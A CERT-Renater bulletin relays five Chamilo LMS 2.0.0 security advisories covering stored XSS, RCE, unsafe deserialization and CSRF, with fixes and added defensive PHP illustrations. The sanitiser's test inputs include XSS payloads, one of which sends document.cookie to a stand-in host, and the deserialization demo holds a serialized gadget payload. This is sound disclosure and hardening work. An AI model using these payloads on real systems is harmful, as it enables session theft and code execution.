
=====================================================================

                            CERT-Renater

                Note d'Information No. 2026/VULN668
_____________________________________________________________________

DATE                : 24/06/2026

HARDWARE PLATFORM(S): /

OPERATING SYSTEM(S): Systems running Chamilo LMS versions prior to 2.0.1.
 
=====================================================================
https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-9833-c7cj-x9xm
https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-g4c3-4g96-6g4m
https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-pr59-4rm7-ghwx
https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-p2qq-wjp2-j334
https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-x88v-rg6r-vqq6
_____________________________________________________________________


Pre-auth stored XSS in public user-profile page (in 2.0.0)
High
ywarnier published GHSA-9833-c7cj-x9xm Jun 24, 2026

Package
Chamilo LMS (PHP)

Affected versions
>= 2.0.0, < 2.0.1

Patched versions
2.0.1


Description

Summary

GET /user/{username} is reachable anonymously and renders six
user-editable profile fields (firstname, lastname, competences,
openarea, teach, diplomas) inside a {% autoescape false %} block.
There is no server-side sanitiser on the write path, so any
ROLE_STUDENT attacker can store HTML in their own profile; the
payload then executes in the browser of any visitor to that profile,
including admins. Verified live on Chamilo 2.1.0 (commit b543d3a).


Impact

    Attacker: ROLE_STUDENT (or anonymous if self-registration
enabled).
    Victim: any visitor to /user/<attacker> incl. admins.
    Trigger: clicking the profile link (link-share / forum / staff
onboarding).
    Result: account takeover via session / JWT / localStorage
exfiltration.


Suggested fix

    Remove {% autoescape false %} from profile.html.twig:4-13.
    Sanitise rich-text fields on write via a Doctrine
PrePersist/PreUpdate listener using RichText::getSafeHtml().
    Reject angle brackets in firstname/lastname on write.
    Consider gating /user/{username} behind #[IsGranted('ROLE_USER')].

Credit

Reported by turingpoint - Jan Kahmen - jan@turingpoint.de


Severity
High
8.9/ 10

CVSS v3 base metrics
Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
Required
Scope
Changed
Confidentiality
High
Integrity
High
Availability
Low
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:L

CVE ID
CVE-2026-45144

Weaknesses
Weakness CWE-79

Credits

    @kah-ja kah-ja Reporter
_____________________________________________________________________

Unauthenticated RCE in 2.0.0
Critical
ywarnier published GHSA-g4c3-4g96-6g4m Jun 9, 2026

Package
Chamilo LMS (PHP)

Affected versions
2.0.0

Patched versions
2.0.1


Description

Impact

Ability to run arbitrary code on the server without authentication.

Severity
Critical
9.8/ 10

CVSS v3 base metrics
Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE ID
CVE-2026-45140

Weaknesses
Weakness CWE-22
Weakness CWE-94
Weakness CWE-219
Weakness CWE-434

Credits

    @h4knet h4knet Reporter

_____________________________________________________________________

An insecure deserialization vulnerability in `career.lib.php` and
`import_csv.php` allows an attacker who can influence database
content to execute arbitrary code on the server via PHP Object
Injection (POP chain). (=2.0.0)

High
ywarnier published GHSA-pr59-4rm7-ghwx Jun 24, 2026

Package
Chamilo LMS (PHP)

Affected versions
2.0.0

Patched versions
2.0.1


Description

Two locations call PHP's native unserialize() on data retrieved from
the database without the ['allowed_classes' => false] safety option:

File: public/main/inc/lib/career.lib.php — Line 495

$userResult = unserialize($careerData['extra_data']);

File: public/main/cron/import_csv.php — Line 2768

$userResult = unserialize($userCareerData['extra_data']);

The extra_data column is populated from user_career records. If an
attacker can write crafted serialized PHP objects into this column
(e.g., via a secondary SQL injection, a compromised admin CSV import,
or a lower-privilege admin panel), they can instantiate arbitrary
PHP objects and trigger POP gadget chains present in Symfony,
Doctrine, or Monolog — all of which are in the autoloader.

The codebase already provides a safe wrapper at
public/main/inc/lib/UnserializeApi.php which enforces an allowed-class
whitelist. Line 475 of career.lib.php itself correctly uses
UnserializeApi::unserialize('career', $item['value']), proving that
the safe API is available but was not applied consistently.
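The following PHP script is an added illustration, not code from the Chamilo project or the advisory: it shows why a bare unserialize() on a database column is an RCE sink, what the ['allowed_classes' => false] option changes, and how an operator can audit existing user_career.extra_data rows. DemoGadget is a constructed stand-in for a real gadget class (it only raises a flag), and safeLoad()/containsObject() are hypothetical helpers, not Chamilo's UnserializeApi.

```php
<?php
declare(strict_types=1);

// Constructed demo gadget standing in for a real POP-chain sink (a Monolog/Symfony/
// Doctrine class whose __destruct or __wakeup has side effects). It only raises a flag.
final class DemoGadget
{
    public static bool $fired = false;
    public string $command = 'id';

    public function __destruct()
    {
        // A real gadget would write a file or run $this->command here.
        self::$fired = true;
    }
}

// What a legitimate user_career.extra_data blob looks like: a plain array.
function legitimateExtraData(): string
{
    return serialize(['promotion_id' => 12, 'progress' => 75]);
}

// What an attacker writes into the column: a serialized object of a gadget class
// (hand-written so that no DemoGadget instance exists before unserialize() runs).
function maliciousExtraData(): string
{
    return 'O:10:"DemoGadget":1:{s:7:"command";s:2:"id";}';
}

// The vulnerable pattern from career.lib.php / import_csv.php: bare unserialize().
function vulnerableLoad(string $blob): mixed
{
    return unserialize($blob);
}

// Hardened loader (hypothetical, in the spirit of UnserializeApi): refuse every class,
// then validate that the decoded value has the shape the caller actually expects.
function safeLoad(string $blob): array
{
    $value = @unserialize($blob, ['allowed_classes' => false]);
    return is_array($value) ? $value : [];   // scalars, false and __PHP_Incomplete_Class all rejected
}

// Audit helper for existing rows: does a decoded value contain any object at all?
function containsObject(mixed $value): bool
{
    if (is_object($value)) {
        return true;                     // __PHP_Incomplete_Class stand-ins count too
    }
    if (is_array($value)) {
        foreach ($value as $item) {
            if (containsObject($item)) {
                return true;
            }
        }
    }
    return false;
}

// Vulnerable path: the gadget is instantiated and its destructor runs as soon as the
// result goes out of scope, before the caller has even looked at the data.
$v = vulnerableLoad(maliciousExtraData());
unset($v);
assert(DemoGadget::$fired === true);

// Hardened path: no class is instantiated, no magic method runs, a bad shape is discarded.
DemoGadget::$fired = false;
assert(safeLoad(maliciousExtraData()) === []);
assert(DemoGadget::$fired === false);
assert(safeLoad(legitimateExtraData()) === ['promotion_id' => 12, 'progress' => 75]);

// Audit: flag any stored row that decodes to something containing an object.
assert(containsObject(@unserialize(maliciousExtraData(), ['allowed_classes' => false])) === true);
assert(containsObject(@unserialize(legitimateExtraData(), ['allowed_classes' => false])) === false);
```

Run it with zend.assertions=1 so the assert() calls are active. The audit loop is the check to run against a copy of the database before and after upgrading to 2.0.1: any extra_data row for which containsObject() returns true was not written by the application's own code path and deserves an incident-response look, since the write itself implies a second vulnerability or abused privilege.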


Impact

Remote Code Execution (RCE). Any attacker who can write to the
user_career.extra_data database column (via CSV import, SQL
injection, or admin access) can execute arbitrary OS commands
as the web server user. This compromises full server
confidentiality, integrity, and availability.


Severity
High
7.5/ 10

CVSS v3 base metrics
Attack vector
Network
Attack complexity
High
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE ID
CVE-2026-45145

Weaknesses
No CWEs

Credits

    @Vishal-07-R Vishal-07-R Reporter
    @liyander liyander Reporter

_____________________________________________________________________

Missing CSRF Protection on Skill AJAX Endpoints (=2.0.0)
High
ywarnier published GHSA-p2qq-wjp2-j334 Jun 24, 2026

Package
Chamilo LMS (PHP)

Affected versions
2.0.0

Patched versions
2.0.1


Description

Multiple destructive AJAX actions in the skill management module lack
CSRF token validation, allowing an attacker to delete skills,
profiles, and gradebook associations via cross-site request forgery.


Details

File: public/main/inc/ajax/skill.ajax.php

The following actions perform destructive database operations without
any Security::check_token() call:

Action                        Lines     Operation
add                           26-36     Creates or edits skill records
delete_gradebook_from_skill   334-351   Deletes skill-gradebook associations
save_profile                  361-384   Creates/modifies skill profiles
delete_profile                386-397   Deletes skill profiles

For contrast, survey.php (line 80) correctly uses
Security::check_token('post') for its destructive group operations.
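The following PHP script is an added illustration, not Chamilo's code: it shows the token check a dispatcher like skill.ajax.php needs in front of its destructive actions. csrf_issue_token()/csrf_check() are hypothetical helpers modelled on the Security::get_token()/check_token() pattern the advisory cites; the session, request and "database" are passed in as plain arrays so the script runs from the CLI without a real PHP session.

```php
<?php
declare(strict_types=1);

// Hypothetical CSRF helpers. The token is bound to the session, so a page on another
// origin can make the victim's browser send the request but cannot supply the token.
function csrf_issue_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));   // 256-bit, CSPRNG, per session
    }
    return $session['csrf_token'];
}

function csrf_check(array $session, string $method, array $post): bool
{
    if (strtoupper($method) !== 'POST') {
        return false;                 // state-changing actions must not be reachable via GET
    }
    $expected = $session['csrf_token'] ?? '';
    $given    = $post['sec_token'] ?? '';
    if ($expected === '' || !is_string($given)) {
        return false;
    }
    return hash_equals($expected, $given);   // constant-time comparison
}

// Dispatcher in the shape of skill.ajax.php: the four destructive actions named in the
// advisory are gated, the read-only action is not.
function skill_ajax_dispatch(array $session, string $method, array $get, array $post, array &$db): string
{
    $action      = $get['a'] ?? '';
    $destructive = ['add', 'delete_gradebook_from_skill', 'save_profile', 'delete_profile'];

    if (in_array($action, $destructive, true) && !csrf_check($session, $method, $post)) {
        return 'forbidden';           // http_response_code(403) in a real endpoint
    }

    switch ($action) {
        case 'delete_profile':
            $id = (int) ($post['id'] ?? 0);
            unset($db['skill_profiles'][$id]);
            return 'deleted';
        case 'get_profile':           // read-only: no token needed
            return json_encode($db['skill_profiles'][(int) ($get['id'] ?? 0)] ?? null);
        default:
            return 'unknown';
    }
}

// Constructed in-memory stand-in for the skill_profile table.
$db      = ['skill_profiles' => [7 => ['name' => 'Data analyst']]];
$session = [];
$token   = csrf_issue_token($session);

// Forged cross-site request: the attacker's page cannot read the victim's token.
assert(skill_ajax_dispatch($session, 'POST', ['a' => 'delete_profile'], ['id' => 7], $db) === 'forbidden');
assert(isset($db['skill_profiles'][7]));

// GET with the right token is still refused: destructive actions are POST-only.
assert(skill_ajax_dispatch($session, 'GET', ['a' => 'delete_profile'], ['id' => 7, 'sec_token' => $token], $db) === 'forbidden');

// Legitimate request issued by the application's own page carries the session token.
assert(skill_ajax_dispatch($session, 'POST', ['a' => 'delete_profile'], ['id' => 7, 'sec_token' => $token], $db) === 'deleted');
assert(!isset($db['skill_profiles'][7]));
```

Setting SameSite=Lax or Strict on the session cookie and verifying the Origin header are worthwhile defence-in-depth measures, but neither replaces the per-session token: the token is what a page on a foreign origin provably cannot obtain.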


Impact

Cross-Site Request Forgery (CSRF). Any authenticated admin or DRH
who visits a malicious page will unknowingly delete or modify
skill records, profiles, and gradebook associations.


Severity
High
7.1/ 10

CVSS v3 base metrics
Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
Required
Scope
Unchanged
Confidentiality
None
Integrity
High
Availability
Low
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:L

CVE ID
CVE-2026-45141

Weaknesses
No CWEs

Credits

    @Vishal-07-R Vishal-07-R Reporter
    @liyander liyander Reporter

_____________________________________________________________________


Student-to-admin stored XSS in private messages via v-html (<=2.0.0)
Critical
ywarnier published GHSA-x88v-rg6r-vqq6 Jun 9, 2026

Package
chamilo/chamilo-lms (Composer)

Affected versions
>= 2.0.0, < 2.1.0

Patched versions
2.0.1

Description

Summary

Message.content is stored raw (no server-side sanitiser) and
rendered in the Vue frontend via v-html="item.content" without
sanitizeHtml(). Any authenticated user (incl. ROLE_STUDENT) can
send a message directly addressed to a specific administrator
(e.g. /api/users/1); when that admin opens their inbox, the
payload fires in their session. This is a targeted
student → admin attack: no phishing indirection and no link click
is required, because opening the inbox is a routine daily action.
Verified live on Chamilo 2.1.0 (commit b543d3a).


Impact

    Attacker: ROLE_STUDENT (lowest authenticated role).
    Victim: any recipient, incl. platform admin. MessageVoter::CREATE
has no role check, so any user may send to any user.
    Trigger: opening the inbox (routine, no phishing).
    Result: account takeover via session-cookie / JWT / localStorage
exfiltration, escalating student → super-admin.


Vulnerable code

src/CoreBundle/State/MessageProcessor.php — persists content via $this->persistProcessor->process(...) without sanitising.

src/CoreBundle/Security/Authorization/Voter/MessageVoter.php:65-69 — any user may CREATE a message where they are the sender.

assets/vue/views/message/MessageShow.vue:118:

<div class="tiny-content" v-html="item.content" />

Legacy Twig path public/main/template/default/message/view_message.html.twig:4,40 has the same issue inside {% autoescape false %}.


Suggested fix

    Sanitise on write in MessageProcessor::process via RichText::getSafeHtml() (HTMLPurifier already wired).
    In MessageShow.vue:118 wrap with sanitizeHtml(item.content) — helper already used in TermsList.vue:34.
    Remove {% autoescape false %} from view_message.html.twig.
    Enable ESLint rule vue/no-v-html.
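The following PHP class is an added illustration serving both XSS advisories on this page (the profile fields in GHSA-9833-c7cj-x9xm and Message.content here); it is not Chamilo's code. It shows the sanitise-on-write step both advisories recommend: plain-text fields (firstname, lastname) reject markup outright, rich-text fields (competences, openarea, teach, diplomas, message content) are reduced to an allow-list of tags and attributes before persistence, so that a template or v-html rendering the stored value unescaped no longer matters. WriteSanitizer is a hypothetical stand-in for RichText::getSafeHtml()/HTMLPurifier and uses only PHP's bundled DOM extension; the demo inputs are constructed.

```php
<?php
declare(strict_types=1);

// Hypothetical allow-list HTML sanitiser for the write path (a Doctrine PrePersist/
// PreUpdate listener for the profile fields, MessageProcessor::process for messages).
final class WriteSanitizer
{
    private const ALLOWED_TAGS  = ['p', 'br', 'b', 'strong', 'i', 'em', 'u', 'ul', 'ol', 'li', 'a'];
    private const ALLOWED_ATTRS = ['a' => ['href']];   // every allowed attribute is URL-checked
    private const DROP_ENTIRELY = ['script', 'style', 'iframe', 'object', 'embed'];

    // firstname / lastname: plain text, any markup is rejected rather than cleaned.
    public static function plainField(string $value): string
    {
        if (preg_match('/[<>]/', $value)) {
            throw new InvalidArgumentException('Angle brackets are not allowed in this field');
        }
        return trim($value);
    }

    // competences / openarea / teach / diplomas / Message.content: rich text, allow-listed.
    public static function richField(string $html): string
    {
        $doc  = new DOMDocument();
        $prev = libxml_use_internal_errors(true);           // tolerate broken markup quietly
        $doc->loadHTML('<?xml encoding="UTF-8"><div>' . $html . '</div>',
            LIBXML_HTML_NOIMPLIED | LIBXML_HTML_NODEFDTD);
        libxml_clear_errors();
        libxml_use_internal_errors($prev);

        $root = $doc->getElementsByTagName('div')->item(0);  // our wrapper is the first div
        self::clean($root);

        $out = '';
        foreach ($root->childNodes as $child) {
            $out .= $doc->saveHTML($child);                  // serialise the wrapper's children only
        }
        return $out;
    }

    private static function clean(DOMNode $node): void
    {
        // Snapshot the children: the list is mutated while we walk it.
        foreach (iterator_to_array($node->childNodes, false) as $child) {
            if ($child instanceof DOMElement) {
                $tag = strtolower($child->tagName);
                if (!in_array($tag, self::ALLOWED_TAGS, true)) {
                    if (in_array($tag, self::DROP_ENTIRELY, true)) {
                        $node->removeChild($child);           // active content: drop with its body
                    } else {
                        // Unwrap: keep the text, lose the element and all its attributes.
                        $node->replaceChild($node->ownerDocument->createTextNode($child->textContent), $child);
                    }
                    continue;
                }
                $allowed = self::ALLOWED_ATTRS[$tag] ?? [];
                foreach (iterator_to_array($child->attributes, false) as $attr) {
                    if (!in_array(strtolower($attr->name), $allowed, true) || !self::safeUrl($attr->value)) {
                        $child->removeAttribute($attr->name); // onerror=, style=, javascript: links
                    }
                }
                self::clean($child);
            } elseif (!$child instanceof DOMText) {
                $node->removeChild($child);                   // comments, processing instructions
            }
        }
    }

    private static function safeUrl(string $url): bool
    {
        // http(s), mailto, same-origin absolute paths (not protocol-relative //host) and fragments.
        return (bool) preg_match('~^(https?://|mailto:|/(?!/)|#)~i', trim($url));
    }
}

// Constructed demo inputs.
assert(WriteSanitizer::plainField(' Alice ') === 'Alice');
try {
    WriteSanitizer::plainField('<img src=x onerror=alert(1)>');
    assert(false, 'markup in a name field must be rejected');
} catch (InvalidArgumentException $e) {
}

$stored = WriteSanitizer::richField(
    '<p onclick="steal()">Hi <b>all</b><script>fetch("https://evil.example/?c=" + document.cookie)</script>'
    . '<img src=x onerror=alert(1)><a href="javascript:alert(1)">link</a><a href="https://example.org/">ok</a></p>'
);
foreach (['<script', 'onerror', 'onclick', 'javascript:', '<img'] as $bad) {
    assert(!str_contains($stored, $bad));
}
assert(str_contains($stored, '<b>all</b>') && str_contains($stored, 'href="https://example.org/"'));
```

Sanitising on write is the right layer for both advisories because it covers every reader at once: the Twig profile.html.twig and view_message.html.twig paths, the Vue v-html path, and any API client. Keep output escaping as well (remove the {% autoescape false %} blocks, wrap v-html with sanitizeHtml()), since stored rows written before the fix are still unsanitised until a migration re-runs the sanitiser over them.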


Credit

Reported by turingpoint - Jan Kahmen - jan@turingpoint.de

Severity
Critical
9.0/ 10

CVSS v3 base metrics
Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
Required
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

CVE ID
CVE-2026-45143

Weaknesses
Weakness CWE-79

Credits

    @kah-ja kah-ja Reporter

=========================================================
+ CERT-RENATER        |    tel : 01-53-94-20-44         +
+ 23/25 Rue Daviel    |    fax : 01-53-94-20-41         +
+ 75013 Paris         |   email:cert@support.renater.fr +
=========================================================